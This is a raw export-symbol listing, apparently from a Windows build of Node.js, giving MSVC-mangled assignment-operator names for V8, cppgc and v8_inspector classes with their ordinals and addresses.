                                                                                                                                                                                                                                    ??4?$basic_ostream@DU?$char_traits@D@std@@@std@@IEAAAEAV01@$$QEAV01@@Z17890x1405396e0
                                                                                                                                                                                                                                    ??4?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAAAEAV01@AEBV01@@Z17900x140539720
                                                                                                                                                                                                                                    ??4?$vector@PEAVMoveOperands@compiler@internal@v8@@V?$ZoneAllocator@PEAVMoveOperands@compiler@internal@v8@@@34@@std@@QEAAAEAV01@$$QEAV01@@Z17910x14057e2c0
                                                                                                                                                                                                                                    ??4?$vector@PEAVMoveOperands@compiler@internal@v8@@V?$ZoneAllocator@PEAVMoveOperands@compiler@internal@v8@@@34@@std@@QEAAAEAV01@AEBV01@@Z17920x14057e2e0
                                                                                                                                                                                                                                    ??4?$vector@PEAVMoveOperands@compiler@internal@v8@@V?$ZoneAllocator@PEAVMoveOperands@compiler@internal@v8@@@34@@std@@QEAAAEAV01@V?$initializer_list@PEAVMoveOperands@compiler@internal@v8@@@1@@Z17930x14057e300
                                                                                                                                                                                                                                    ??4?$vector@UCpuProfileDeoptFrame@v8@@V?$allocator@UCpuProfileDeoptFrame@v8@@@std@@@std@@QEAAAEAV01@$$QEAV01@@Z17940x14009aef0
                                                                                                                                                                                                                                    ??4?$vector@UCpuProfileDeoptFrame@v8@@V?$allocator@UCpuProfileDeoptFrame@v8@@@std@@@std@@QEAAAEAV01@AEBV01@@Z17950x14009a8f0
                                                                                                                                                                                                                                    ??4?$vector@UCpuProfileDeoptFrame@v8@@V?$allocator@UCpuProfileDeoptFrame@v8@@@std@@@std@@QEAAAEAV01@V?$initializer_list@UCpuProfileDeoptFrame@v8@@@1@@Z17960x14009a870
                                                                                                                                                                                                                                    ??4?$vector@UCpuProfileDeoptInfo@v8@@V?$allocator@UCpuProfileDeoptInfo@v8@@@std@@@std@@QEAAAEAV01@$$QEAV01@@Z17970x140099e60
                                                                                                                                                                                                                                    ??4?$vector@UCpuProfileDeoptInfo@v8@@V?$allocator@UCpuProfileDeoptInfo@v8@@@std@@@std@@QEAAAEAV01@AEBV01@@Z17980x1400996f0
                                                                                                                                                                                                                                    ??4?$vector@UCpuProfileDeoptInfo@v8@@V?$allocator@UCpuProfileDeoptInfo@v8@@@std@@@std@@QEAAAEAV01@V?$initializer_list@UCpuProfileDeoptInfo@v8@@@1@@Z17990x1400996c0
                                                                                                                                                                                                                                    ??4AccessorPair@debug@v8@@QEAAAEAV012@$$QEAV012@@Z18000x1400972c0
                                                                                                                                                                                                                                    ??4AccessorPair@debug@v8@@QEAAAEAV012@AEBV012@@Z18010x1400972c0
                                                                                                                                                                                                                                    ??4AccessorSignature@v8@@QEAAAEAV01@$$QEAV01@@Z18020x1400972c0
                                                                                                                                                                                                                                    ??4AccessorSignature@v8@@QEAAAEAV01@AEBV01@@Z18030x1400972c0
                                                                                                                                                                                                                                    ??4ActivityControl@v8@@QEAAAEAV01@AEBV01@@Z18040x1400972c0
                                                                                                                                                                                                                                    ??4AddressSpaceReservation@base@v8@@QEAAAEAV012@$$QEAV012@@Z18050x140097ca0
                                                                                                                                                                                                                                    ??4AddressSpaceReservation@base@v8@@QEAAAEAV012@AEBV012@@Z18060x140097880
                                                                                                                                                                                                                                    ??4AddressToTraceMap@internal@v8@@QEAAAEAV012@$$QEAV012@@Z18070x14086ad90
                                                                                                                                                                                                                                    ??4AddressToTraceMap@internal@v8@@QEAAAEAV012@AEBV012@@Z18080x14086ade0
                                                                                                                                                                                                                                    ??4AlignedSlotAllocator@internal@v8@@QEAAAEAV012@$$QEAV012@@Z18090x14057e330
                                                                                                                                                                                                                                    ??4AlignedSlotAllocator@internal@v8@@QEAAAEAV012@AEBV012@@Z18100x140097880
                                                                                                                                                                                                                                    ??4AllocationHandle@cppgc@@QEAAAEAV01@$$QEAV01@@Z18110x1400972c0
                                                                                                                                                                                                                                    ??4AllocationHandle@cppgc@@QEAAAEAV01@AEBV01@@Z18120x1400972c0
                                                                                                                                                                                                                                    ??4AllocationProfile@v8@@QEAAAEAV01@AEBV01@@Z18130x1400972c0
                                                                                                                                                                                                                                    ??4Allocator@ArrayBuffer@v8@@QEAAAEAV012@AEBV012@@Z18140x1400972c0
                                                                                                                                                                                                                                    ??4Array@v8@@QEAAAEAV01@$$QEAV01@@Z18150x1400972c0
                                                                                                                                                                                                                                    ??4Array@v8@@QEAAAEAV01@AEBV01@@Z18160x1400972c0
                                                                                                                                                                                                                                    ??4ArrayBuffer@v8@@QEAAAEAV01@$$QEAV01@@Z18170x1400972c0
                                                                                                                                                                                                                                    ??4ArrayBuffer@v8@@QEAAAEAV01@AEBV01@@Z18180x1400972c0
                                                                                                                                                                                                                                    ??4ArrayBufferAllocator@node@@QEAAAEAV01@$$QEAV01@@Z18190x1400972c0
                                                                                                                                                                                                                                    ??4ArrayBufferAllocator@node@@QEAAAEAV01@AEBV01@@Z18200x1400972c0
                                                                                                                                                                                                                                    ??4ArrayBufferView@v8@@QEAAAEAV01@$$QEAV01@@Z18210x1400972c0
                                                                                                                                                                                                                                    ??4ArrayBufferView@v8@@QEAAAEAV01@AEBV01@@Z18220x1400972c0
                                                                                                                                                                                                                                    ??4AsmJsScanner@internal@v8@@QEAAAEAV012@$$QEAV012@@Z18230x1407336d0
                                                                                                                                                                                                                                    ??4AsmJsScanner@internal@v8@@QEAAAEAV012@AEBV012@@Z18240x140733830
                                                                                                                                                                                                                                    ??4AsmType@wasm@internal@v8@@QEAAAEAV0123@$$QEAV0123@@Z18250x1400972c0
                                                                                                                                                                                                                                    ??4AsmType@wasm@internal@v8@@QEAAAEAV0123@AEBV0123@@Z18260x1400972c0
                                                                                                                                                                                                                                    ??4AssemblerOptions@internal@v8@@QEAAAEAU012@$$QEAU012@@Z18270x140559540
                                                                                                                                                                                                                                    ??4AssemblerOptions@internal@v8@@QEAAAEAU012@AEBU012@@Z18280x1400978f0
                                                                                                                                                                                                                                    ??4AstRawStringComparer@SourceTextModuleDescriptor@internal@v8@@QEAAAEAU0123@$$QEAU0123@@Z18290x1400972c0
                                                                                                                                                                                                                                    ??4AstRawStringComparer@SourceTextModuleDescriptor@internal@v8@@QEAAAEAU0123@AEBU0123@@Z18300x1400972c0
                                                                                                                                                                                                                                    ??4AtomicsWaitWakeHandle@Isolate@v8@@QEAAAEAV012@$$QEAV012@@Z18310x1400972c0
                                                                                                                                                                                                                                    ??4AtomicsWaitWakeHandle@Isolate@v8@@QEAAAEAV012@AEBV012@@Z18320x1400972c0
                                                                                                                                                                                                                                    ??4BackingStore@v8@@QEAAAEAV01@AEBV01@@Z18330x1400972c0
                                                                                                                                                                                                                                    ??4BackupIncumbentScope@Context@v8@@QEAAAEAV012@AEBV012@@Z18340x1400978f0
                                                                                                                                                                                                                                    ??4BaseObjectSizeTrait@internal@cppgc@@QEAAAEAU012@$$QEAU012@@Z18350x1400972c0
                                                                                                                                                                                                                                    ??4BaseObjectSizeTrait@internal@cppgc@@QEAAAEAU012@AEBU012@@Z18360x1400972c0
                                                                                                                                                                                                                                    ??4BigInt64Array@v8@@QEAAAEAV01@$$QEAV01@@Z18370x1400972c0
                                                                                                                                                                                                                                    ??4BigInt64Array@v8@@QEAAAEAV01@AEBV01@@Z18380x1400972c0
                                                                                                                                                                                                                                    ??4BigInt@v8@@QEAAAEAV01@$$QEAV01@@Z18390x1400972c0
                                                                                                                                                                                                                                    ??4BigInt@v8@@QEAAAEAV01@AEBV01@@Z18400x1400972c0
                                                                                                                                                                                                                                    ??4BigIntObject@v8@@QEAAAEAV01@$$QEAV01@@Z18410x1400972c0
                                                                                                                                                                                                                                    ??4BigIntObject@v8@@QEAAAEAV01@AEBV01@@Z18420x1400972c0
                                                                                                                                                                                                                                    ??4BigIntToI32PairDescriptor@internal@v8@@QEAAAEAV012@$$QEAV012@@Z18430x140097a90
                                                                                                                                                                                                                                    ??4BigIntToI32PairDescriptor@internal@v8@@QEAAAEAV012@AEBV012@@Z18440x140097a90
                                                                                                                                                                                                                                    ??4BigIntToI64Descriptor@internal@v8@@QEAAAEAV012@$$QEAV012@@Z18450x140097a90
                                                                                                                                                                                                                                    ??4BigIntToI64Descriptor@internal@v8@@QEAAAEAV012@AEBV012@@Z18460x140097a90
                                                                                                                                                                                                                                    ??4BigUint64Array@v8@@QEAAAEAV01@$$QEAV01@@Z18470x1400972c0
                                                                                                                                                                                                                                    ??4BigUint64Array@v8@@QEAAAEAV01@AEBV01@@Z18480x1400972c0
                                                                                                                                                                                                                                    ??4Binary@protocol@v8_inspector@@QEAAAEAV012@$$QEAV012@@Z18490x1400bfb90
                                                                                                                                                                                                                                    ??4Binary@protocol@v8_inspector@@QEAAAEAV012@AEBV012@@Z18500x1400ca180
                                                                                                                                                                                                                                    ??4BitVector@internal@v8@@QEAAAEAV012@$$QEAV012@@Z18510x1405398f0
                                                                                                                                                                                                                                    ??4Bitmap@internal@v8@@QEAAAEAV012@$$QEAV012@@Z18520x1400972c0
                                                                                                                                                                                                                                    ??4Bitmap@internal@v8@@QEAAAEAV012@AEBV012@@Z18530x1400972c0
                                                                                                                                                                                                                                    ??4BitsetType@compiler@internal@v8@@QEAAAEAV0123@$$QEAV0123@@Z18540x1400972c0
                                                                                                                                                                                                                                    ??4BitsetType@compiler@internal@v8@@QEAAAEAV0123@AEBV0123@@Z18550x1400972c0
                                                                                                                                                                                                                                    ??4BlockData@Coverage@debug@v8@@QEAAAEAV0123@$$QEAV0123@@Z18560x140539910
                                                                                                                                                                                                                                    ??4BodyDescriptor@SwissNameDictionary@internal@v8@@QEAAAEAV0123@$$QEAV0123@@Z18570x1400972c0
                                                                                                                                                                                                                                    ??4BodyDescriptor@SwissNameDictionary@internal@v8@@QEAAAEAV0123@AEBV0123@@Z18580x1400972c0
                                                                                                                                                                                                                                    ??4Boolean@v8@@QEAAAEAV01@$$QEAV01@@Z18590x1400972c0
                                                                                                                                                                                                                                    ??4Boolean@v8@@QEAAAEAV01@AEBV01@@Z18600x1400972c0
                                                                                                                                                                                                                                    ??4BooleanObject@v8@@QEAAAEAV01@$$QEAV01@@Z18610x1400972c0
                                                                                                                                                                                                                                    ??4BooleanObject@v8@@QEAAAEAV01@AEBV01@@Z18620x1400972c0
                                                                                                                                                                                                                                    ??4BranchHintMap@wasm@internal@v8@@QEAAAEAV0123@$$QEAV0123@@Z18630x140539940
                                                                                                                                                                                                                                    ??4BranchHintMap@wasm@internal@v8@@QEAAAEAV0123@AEBV0123@@Z18640x1405399e0
                                                                                                                                                                                                                                    ??4BranchMatcher@compiler@internal@v8@@QEAAAEAU0123@$$QEAU0123@@Z18650x140097e10
                                                                                                                                                                                                                                    ??4BranchMatcher@compiler@internal@v8@@QEAAAEAU0123@AEBU0123@@Z18660x1400978f0
                                                                                                                                                                                                                                    ??4BreakLocation@debug@v8@@QEAAAEAV012@$$QEAV012@@Z18670x140539b40
                                                                                                                                                                                                                                    ??4BreakLocation@debug@v8@@QEAAAEAV012@AEBV012@@Z18680x140097880
                                                                                                                                                                                                                                    ??4ByteData@PreparseDataBuilder@internal@v8@@QEAAAEAV0123@$$QEAV0123@@Z18690x140539b60
                                                                                                                                                                                                                                    ??4ByteData@PreparseDataBuilder@internal@v8@@QEAAAEAV0123@AEBV0123@@Z18700x140097fc0
                                                                                                                                                                                                                                    ??4BytecodeDecoder@interpreter@internal@v8@@QEAAAEAV0123@$$QEAV0123@@Z18710x1400972c0
                                                                                                                                                                                                                                    ??4BytecodeDecoder@interpreter@internal@v8@@QEAAAEAV0123@AEBV0123@@Z18720x1400972c0
                                                                                                                                                                                                                                    ??4BytecodeIterator@wasm@internal@v8@@QEAAAEAV0123@$$QEAV0123@@Z18730x14061ce20
                                                                                                                                                                                                                                    ??4BytecodeIterator@wasm@internal@v8@@QEAAAEAV0123@AEBV0123@@Z18740x14061ce20
                                                                                                                                                                                                                                    ??4BytecodeJumpTable@interpreter@internal@v8@@QEAAAEAV0123@$$QEAV0123@@Z18750x140a32e20
                                                                                                                                                                                                                                    ??4BytecodeJumpTable@interpreter@internal@v8@@QEAAAEAV0123@AEBV0123@@Z18760x1400978f0
                                                                                                                                                                                                                                    ??4BytecodeLabel@interpreter@internal@v8@@QEAAAEAV0123@$$QEAV0123@@Z18770x140a30ad0
                                                                                                                                                                                                                                    ??4BytecodeLabel@interpreter@internal@v8@@QEAAAEAV0123@AEBV0123@@Z18780x140097880
                                                                                                                                                                                                                                    ??4BytecodeLivenessMap@compiler@internal@v8@@QEAAAEAV0123@$$QEAV0123@@Z18790x140097a90
                                                                                                                                                                                                                                    ??4BytecodeLivenessMap@compiler@internal@v8@@QEAAAEAV0123@AEBV0123@@Z18800x140097a90
                                                                                                                                                                                                                                    ??4BytecodeLoopHeader@interpreter@internal@v8@@QEAAAEAV0123@$$QEAV0123@@Z18810x140097a90
                                                                                                                                                                                                                                    ??4BytecodeLoopHeader@interpreter@internal@v8@@QEAAAEAV0123@AEBV0123@@Z18820x140097a90
                                                                                                                                                                                                                                    ??4BytecodeNode@interpreter@internal@v8@@QEAAAEAV0123@$$QEAV0123@@Z18830x140a39730
                                                                                                                                                                                                                                    ??4BytecodeNode@interpreter@internal@v8@@QEAAAEAV0123@AEBV0123@@Z18840x140097f70
                                                                                                                                                                                                                                    ??4Bytecodes@interpreter@internal@v8@@QEAAAEAV0123@$$QEAV0123@@Z18850x1400972c0
                                                                                                                                                                                                                                    ??4Bytecodes@interpreter@internal@v8@@QEAAAEAV0123@AEBV0123@@Z18860x1400972c0
                                                                                                                                                                                                                                    ??4CFunction@v8@@QEAAAEAV01@$$QEAV01@@Z18870x140097ca0
                                                                                                                                                                                                                                    ??4CFunction@v8@@QEAAAEAV01@AEBV01@@Z18880x140097880
                                                                                                                                                                                                                                    ??4CPU@base@v8@@QEAAAEAV012@$$QEAV012@@Z18890x140ff1540
                                                                                                                                                                                                                                    ??4CPU@base@v8@@QEAAAEAV012@AEBV012@@Z18900x140ff16a0
                                                                                                                                                                                                                                    ??4CallDescriptors@internal@v8@@QEAAAEAV012@$$QEAV012@@Z18910x1400972c0
                                                                                                                                                                                                                                    ??4CallDescriptors@internal@v8@@QEAAAEAV012@AEBV012@@Z18920x1400972c0
                                                                                                                                                                                                                                    ??4CallInterfaceDescriptor@internal@v8@@QEAAAEAV012@AEBV012@@Z18930x140097a90
                                                                                                                                                                                                                                    ??4Channel@V8Inspector@v8_inspector@@QEAAAEAV012@AEBV012@@Z18940x1400972c0
                                                                                                                                                                                                                                    ??4CodeCommentsIterator@internal@v8@@QEAAAEAV012@$$QEAV012@@Z18950x140559590
                                                                                                                                                                                                                                    ??4CodeCommentsIterator@internal@v8@@QEAAAEAV012@AEBV012@@Z18960x1400978f0
                                                                                                                                                                                                                                    ??4CodeEvent@v8@@QEAAAEAV01@$$QEAV01@@Z18970x1400972c0
                                                                                                                                                                                                                                    ??4CodeEvent@v8@@QEAAAEAV01@AEBV01@@Z18980x1400972c0
                                                                                                                                                                                                                                    ??4CodeFactory@internal@v8@@QEAAAEAV012@$$QEAV012@@Z18990x1400972c0
                                                                                                                                                                                                                                    ??4CodeFactory@internal@v8@@QEAAAEAV012@AEBV012@@Z19000x1400972c0
                                                                                                                                                                                                                                    ??4CommandLineAPIScope@V8InspectorSession@v8_inspector@@QEAAAEAV012@AEBV012@@Z19010x1400972c0
                                                                                                                                                                                                                                    ??4CompilationEventCallback@wasm@internal@v8@@QEAAAEAV0123@AEBV0123@@Z19020x1400972c0
                                                                                                                                                                                                                                    ??4CompilationJob@internal@v8@@QEAAAEAV012@AEBV012@@Z19030x1406bbf40
                                                                                                                                                                                                                                    ??4CompilationResultResolver@wasm@internal@v8@@QEAAAEAV0123@AEBV0123@@Z19040x1400972c0
                                                                                                                                                                                                                                    ??4CompilationState@wasm@internal@v8@@QEAAAEAV0123@AEBV0123@@Z19050x1400972c0
                                                                                                                                                                                                                                    ??4Compiler@internal@v8@@QEAAAEAV012@$$QEAV012@@Z19060x1400972c0
                                                                                                                                                                                                                                    ??4Compiler@internal@v8@@QEAAAEAV012@AEBV012@@Z19070x1400972c0
                                                                                                                                                                                                                                    ??4Constant@compiler@internal@v8@@QEAAAEAV0123@$$QEAV0123@@Z19080x14057e350
                                                                                                                                                                                                                                    ??4Constant@compiler@internal@v8@@QEAAAEAV0123@AEBV0123@@Z19090x140097880
                                                                                                                                                                                                                                    ??4ConstantArrayBuilder@interpreter@internal@v8@@QEAAAEAV0123@$$QEAV0123@@Z19100x140a30af0
                                                                                                                                                                                                                                    ??4Context@v8@@QEAAAEAV01@$$QEAV01@@Z19110x1400972c0
                                                                                                                                                                                                                                    ??4Context@v8@@QEAAAEAV01@AEBV01@@Z19120x1400972c0
                                                                                                                                                                                                                                    ??4Coverage@debug@v8@@QEAAAEAV012@$$QEAV012@@Z19130x140539b90
                                                                                                                                                                                                                                    ??4CppGraphBuilder@internal@v8@@QEAAAEAV012@$$QEAV012@@Z19140x1400972c0
                                                                                                                                                                                                                                    ??4CppGraphBuilder@internal@v8@@QEAAAEAV012@AEBV012@@Z19150x1400972c0
                                                                                                                                                                                                                                    ??4CppHeap@v8@@QEAAAEAV01@AEBV01@@Z19160x1400972c0
                                                                                                                                                                                                                                    ??4CpuFeatureScope@internal@v8@@QEAAAEAV012@AEBV012@@Z19170x1400972c0
                                                                                                                                                                                                                                    ??4CpuProfile@v8@@QEAAAEAV01@$$QEAV01@@Z19180x1400972c0
                                                                                                                                                                                                                                    ??4CpuProfile@v8@@QEAAAEAV01@AEBV01@@Z19190x1400972c0
                                                                                                                                                                                                                                    ??4CpuProfileDeoptInfo@v8@@QEAAAEAU01@$$QEAU01@@Z19200x140098940
                                                                                                                                                                                                                                    ??4CpuProfileDeoptInfo@v8@@QEAAAEAU01@AEBU01@@Z19210x1400988a0
                                                                                                                                                                                                                                    ??4CpuProfileNode@v8@@QEAAAEAV01@$$QEAV01@@Z19220x1400972c0
                                                                                                                                                                                                                                    ??4CpuProfileNode@v8@@QEAAAEAV01@AEBV01@@Z19230x1400972c0
                                                                                                                                                                                                                                    ??4CpuProfilingOptions@v8@@QEAAAEAV01@$$QEAV01@@Z19240x140098a40
                                                                                                                                                                                                                                    ??4CpuProfilingOptions@v8@@QEAAAEAV01@AEBV01@@Z19250x140098a40
                                                                                                                                                                                                                                    ??4CreateParams@Isolate@v8@@QEAAAEAU012@AEBU012@@Z19260x1400981f0
                                                                                                                                                                                                                                    ??4Data@v8@@QEAAAEAV01@$$QEAV01@@Z19270x1400972c0
                                                                                                                                                                                                                                    ??4Data@v8@@QEAAAEAV01@AEBV01@@Z19280x1400972c0
                                                                                                                                                                                                                                    ??4DataView@v8@@QEAAAEAV01@$$QEAV01@@Z19290x1400972c0
                                                                                                                                                                                                                                    ??4DataView@v8@@QEAAAEAV01@AEBV01@@Z19300x1400972c0
                                                                                                                                                                                                                                    ??4Date@v8@@QEAAAEAV01@$$QEAV01@@Z19310x1400972c0
                                                                                                                                                                                                                                    ??4Date@v8@@QEAAAEAV01@AEBV01@@Z19320x1400972c0
                                                                                                                                                                                                                                    ??4DateCache@internal@v8@@QEAAAEAV012@AEBV012@@Z19330x140817e40
                                                                                                                                                                                                                                    ??4DbgStreamBuf@internal@v8@@QEAAAEAV012@AEBV012@@Z19340x140539bb0
                                                                                                                                                                                                                                    ??4DefaultEmbedderRootsHandler@internal@v8@@QEAAAEAV012@$$QEAV012@@Z19350x140097e00
                                                                                                                                                                                                                                    ??4DefaultEmbedderRootsHandler@internal@v8@@QEAAAEAV012@AEBV012@@Z19360x140097e00
                                                                                                                                                                                                                                    ??4Delegate@ValueDeserializer@v8@@QEAAAEAV012@AEBV012@@Z19370x1400972c0
                                                                                                                                                                                                                                    ??4Delegate@ValueSerializer@v8@@QEAAAEAV012@AEBV012@@Z19380x1400972c0
                                                                                                                                                                                                                                    ??4DeleteACHHandle@node@@QEAAAEAU01@$$QEAU01@@Z19390x1400972c0
                                                                                                                                                                                                                                    ??4DeleteACHHandle@node@@QEAAAEAU01@AEBU01@@Z19400x1400972c0
                                                                                                                                                                                                                                    ??4Descriptor@internal@v8@@QEAAAEAV012@$$QEAV012@@Z19410x140539c00
                                                                                                                                                                                                                                    ??4Descriptor@internal@v8@@QEAAAEAV012@AEBV012@@Z19420x140097fc0
                                                                                                                                                                                                                                    ??4DetachableVectorBase@internal@v8@@QEAAAEAV012@$$QEAV012@@Z19430x140097e10
                                                                                                                                                                                                                                    ??4DetachableVectorBase@internal@v8@@QEAAAEAV012@AEBV012@@Z19440x1400978f0
                                                                                                                                                                                                                                    ??4DiamondMatcher@compiler@internal@v8@@QEAAAEAU0123@$$QEAU0123@@Z19450x140097fe0
                                                                                                                                                                                                                                    ??4DiamondMatcher@compiler@internal@v8@@QEAAAEAU0123@AEBU0123@@Z19460x140097fc0
                                                                                                                                                                                                                                    ??4DiscardedSamplesDelegate@v8@@QEAAAEAV01@AEBV01@@Z19470x1400989b0
                                                                                                                                                                                                                                    ??4DisjointAllocationPool@wasm@internal@v8@@QEAAAEAV0123@$$QEAV0123@@Z19480x140539c20
                                                                                                                                                                                                                                    ??4Domain@API@Schema@protocol@v8_inspector@@QEAAAEAV01234@$$QEAV01234@@Z19490x1400972c0
                                                                                                                                                                                                                                    ??4Domain@API@Schema@protocol@v8_inspector@@QEAAAEAV01234@AEBV01234@@Z19500x1400972c0
                                                                                                                                                                                                                                    ??4EhFrameConstants@internal@v8@@QEAAAEAV012@$$QEAV012@@Z19510x1400972c0
                                                                                                                                                                                                                                    ??4EhFrameConstants@internal@v8@@QEAAAEAV012@AEBV012@@Z19520x1400972c0
                                                                                                                                                                                                                                    ??4EhFrameIterator@internal@v8@@QEAAAEAV012@$$QEAV012@@Z19530x140097e10
                                                                                                                                                                                                                                    ??4EhFrameIterator@internal@v8@@QEAAAEAV012@AEBV012@@Z19540x1400978f0
                                                                                                                                                                                                                                    ??4EmbedderGraph@v8@@QEAAAEAV01@AEBV01@@Z19550x1400972c0
                                                                                                                                                                                                                                    ??4EmbedderHeapTracer@v8@@QEAAAEAV01@AEBV01@@Z19560x140097e00
                                                                                                                                                                                                                                    ??4EmbedderRootsHandler@v8@@QEAAAEAV01@AEBV01@@Z19570x1400972c0
                                                                                                                                                                                                                                    ??4EmbedderState@internal@v8@@QEAAAEAV012@AEBV012@@Z19580x140097fc0
                                                                                                                                                                                                                                    ??4EnsureGCInfoIndexTrait@internal@cppgc@@QEAAAEAU012@$$QEAU012@@Z19590x1400972c0
                                                                                                                                                                                                                                    ??4EnsureGCInfoIndexTrait@internal@cppgc@@QEAAAEAU012@AEBU012@@Z19600x1400972c0
                                                                                                                                                                                                                                    ??4Entry@TypeProfile@debug@v8@@QEAAAEAV0123@$$QEAV0123@@Z19610x140539910
                                                                                                                                                                                                                                    ??4EphemeronHashTable@internal@v8@@QEAAAEAV012@$$QEAV012@@Z19620x140097a90
                                                                                                                                                                                                                                    ??4EphemeronHashTable@internal@v8@@QEAAAEAV012@AEBV012@@Z19630x140097a90
                                                                                                                                                                                                                                    ??4Exception@v8@@QEAAAEAV01@$$QEAV01@@Z19640x1400972c0
                                                                                                                                                                                                                                    ??4Exception@v8@@QEAAAEAV01@AEBV01@@Z19650x1400972c0
                                                                                                                                                                                                                                    ??4Exported@protocol@v8_inspector@@QEAAAEAV012@AEBV012@@Z19660x1400972c0
                                                                                                                                                                                                                                    ??4External@v8@@QEAAAEAV01@$$QEAV01@@Z19670x1400972c0
                                                                                                                                                                                                                                    ??4External@v8@@QEAAAEAV01@AEBV01@@Z19680x1400972c0
                                                                                                                                                                                                                                    ??4ExternalResourceVisitor@v8@@QEAAAEAV01@AEBV01@@Z19690x1400972c0
                                                                                                                                                                                                                                    ??4ExternalSourceStream@ScriptCompiler@v8@@QEAAAEAV012@AEBV012@@Z19700x1400972c0
                                                                                                                                                                                                                                    ??4Factory@internal@v8@@QEAAAEAV012@$$QEAV012@@Z19710x1400972c0
                                                                                                                                                                                                                                    ??4Factory@internal@v8@@QEAAAEAV012@AEBV012@@Z19720x1400972c0
                                                                                                                                                                                                                                    ??4FeedbackIterator@internal@v8@@QEAAAEAV012@$$QEAV012@@Z19730x140539cc0
                                                                                                                                                                                                                                    ??4FeedbackIterator@internal@v8@@QEAAAEAV012@AEBV012@@Z19740x140097f70
                                                                                                                                                                                                                                    ??4FeedbackVectorSpec@internal@v8@@QEAAAEAV012@$$QEAV012@@Z19750x140539cf0
                                                                                                                                                                                                                                    ??4FeedbackVectorSpec@internal@v8@@QEAAAEAV012@AEBV012@@Z19760x140539e20
                                                                                                                                                                                                                                    ??4FixedArray@v8@@QEAAAEAV01@$$QEAV01@@Z19770x1400972c0
                                                                                                                                                                                                                                    ??4FixedArray@v8@@QEAAAEAV01@AEBV01@@Z19780x1400972c0
                                                                                                                                                                                                                                    ??4FlagList@internal@v8@@QEAAAEAV012@$$QEAV012@@Z19790x1400972c0
                                                                                                                                                                                                                                    ??4FlagList@internal@v8@@QEAAAEAV012@AEBV012@@Z19800x1400972c0
                                                                                                                                                                                                                                    ??4Float32Array@v8@@QEAAAEAV01@$$QEAV01@@Z19810x1400972c0
                                                                                                                                                                                                                                    ??4Float32Array@v8@@QEAAAEAV01@AEBV01@@Z19820x1400972c0
                                                                                                                                                                                                                                    ??4Float64Array@v8@@QEAAAEAV01@$$QEAV01@@Z19830x1400972c0
                                                                                                                                                                                                                                    ??4Float64Array@v8@@QEAAAEAV01@AEBV01@@Z19840x1400972c0
                                                                                                                                                                                                                                    ??4FreeList@internal@cppgc@@QEAAAEAV012@$$QEAV012@@Z19850x14051c8e0
                                                                                                                                                                                                                                    ??4Function@v8@@QEAAAEAV01@$$QEAV01@@Z19860x1400972c0
                                                                                                                                                                                                                                    ??4Function@v8@@QEAAAEAV01@AEBV01@@Z19870x1400972c0
                                                                                                                                                                                                                                    ??4FunctionData@Coverage@debug@v8@@QEAAAEAV0123@$$QEAV0123@@Z19880x140539910
                                                                                                                                                                                                                                    ??4FunctionTargetAndRef@internal@v8@@QEAAAEAV012@$$QEAV012@@Z19890x140097ca0
                                                                                                                                                                                                                                    ??4FunctionTargetAndRef@internal@v8@@QEAAAEAV012@AEBV012@@Z19900x140097880
                                                                                                                                                                                                                                    ??4FunctionTemplate@v8@@QEAAAEAV01@$$QEAV01@@Z19910x1400972c0
                                                                                                                                                                                                                                    ??4FunctionTemplate@v8@@QEAAAEAV01@AEBV01@@Z19920x1400972c0
                                                                                                                                                                                                                                    ??4GlobalDictionary@internal@v8@@QEAAAEAV012@$$QEAV012@@Z19930x140097a90
                                                                                                                                                                                                                                    ??4GlobalDictionary@internal@v8@@QEAAAEAV012@AEBV012@@Z19940x140097a90
                                                                                                                                                                                                                                    ??4GlobalDictionaryShape@internal@v8@@QEAAAEAV012@$$QEAV012@@Z19950x1400972c0
                                                                                                                                                                                                                                    ??4GlobalDictionaryShape@internal@v8@@QEAAAEAV012@AEBV012@@Z19960x1400972c0
                                                                                                                                                                                                                                    ??4HashTableBase@internal@v8@@QEAAAEAV012@$$QEAV012@@Z19970x140097a90
                                                                                                                                                                                                                                    ??4HashTableBase@internal@v8@@QEAAAEAV012@AEBV012@@Z19980x140097a90
                                                                                                                                                                                                                                    ??4Heap@cppgc@@QEAAAEAV01@AEBV01@@Z19990x1400972c0
                                                                                                                                                                                                                                    ??4HeapCodeStatistics@v8@@QEAAAEAV01@$$QEAV01@@Z20000x140097fe0
                                                                                                                                                                                                                                    ??4HeapCodeStatistics@v8@@QEAAAEAV01@AEBV01@@Z20010x140097fc0
                                                                                                                                                                                                                                    ??4HeapConstantType@compiler@internal@v8@@QEAAAEAV0123@$$QEAV0123@@Z20020x14057e370
                                                                                                                                                                                                                                    ??4HeapConstantType@compiler@internal@v8@@QEAAAEAV0123@AEBV0123@@Z20030x140097fc0
                                                                                                                                                                                                                                    ??4HeapGraphEdge@v8@@QEAAAEAV01@$$QEAV01@@Z20040x1400972c0
                                                                                                                                                                                                                                    ??4HeapGraphEdge@v8@@QEAAAEAV01@AEBV01@@Z20050x1400972c0
                                                                                                                                                                                                                                    ??4HeapGraphNode@v8@@QEAAAEAV01@$$QEAV01@@Z20060x1400972c0
                                                                                                                                                                                                                                    ??4HeapGraphNode@v8@@QEAAAEAV01@AEBV01@@Z20070x1400972c0
                                                                                                                                                                                                                                    ??4HeapHandle@cppgc@@QEAAAEAV01@$$QEAV01@@Z20080x1400972c0
                                                                                                                                                                                                                                    ??4HeapHandle@cppgc@@QEAAAEAV01@AEBV01@@Z20090x1400972c0
                                                                                                                                                                                                                                    ??4HeapObjectStatistics@v8@@QEAAAEAV01@$$QEAV01@@Z20100x140097fe0
                                                                                                                                                                                                                                    ??4HeapObjectStatistics@v8@@QEAAAEAV01@AEBV01@@Z20110x140097fc0
                                                                                                                                                                                                                                    ??4HeapRegistry@internal@cppgc@@QEAAAEAV012@$$QEAV012@@Z20120x1400972c0
                                                                                                                                                                                                                                    ??4HeapRegistry@internal@cppgc@@QEAAAEAV012@AEBV012@@Z20130x1400972c0
                                                                                                                                                                                                                                    ??4HeapSnapshot@v8@@QEAAAEAV01@$$QEAV01@@Z20140x1400972c0
                                                                                                                                                                                                                                    ??4HeapSnapshot@v8@@QEAAAEAV01@AEBV01@@Z20150x1400972c0
                                                                                                                                                                                                                                    ??4HeapSpaceStatistics@v8@@QEAAAEAV01@$$QEAV01@@Z20160x140097f90
                                                                                                                                                                                                                                    ??4HeapSpaceStatistics@v8@@QEAAAEAV01@AEBV01@@Z20170x140097f70
                                                                                                                                                                                                                                    ??4HeapState@subtle@cppgc@@QEAAAEAV012@$$QEAV012@@Z20180x1400972c0
                                                                                                                                                                                                                                    ??4HeapState@subtle@cppgc@@QEAAAEAV012@AEBV012@@Z20190x1400972c0
